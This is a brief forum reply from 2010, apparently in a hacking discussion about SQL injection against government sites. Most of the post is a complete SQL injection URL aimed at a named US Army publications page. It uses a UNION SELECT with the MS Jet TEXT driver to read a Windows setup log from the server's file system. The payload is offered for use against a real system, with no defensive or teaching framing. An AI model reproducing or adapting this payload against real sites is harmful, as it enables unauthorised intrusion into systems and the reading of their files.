Re: NASA exploitation by complex SQL injection..."vinnu"
Date: February 15, 2010 12:46AM
This is MS Jet database, check the file system access using SQL injection:
http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]'&pubNo=&date1=&date2=&pubDesc=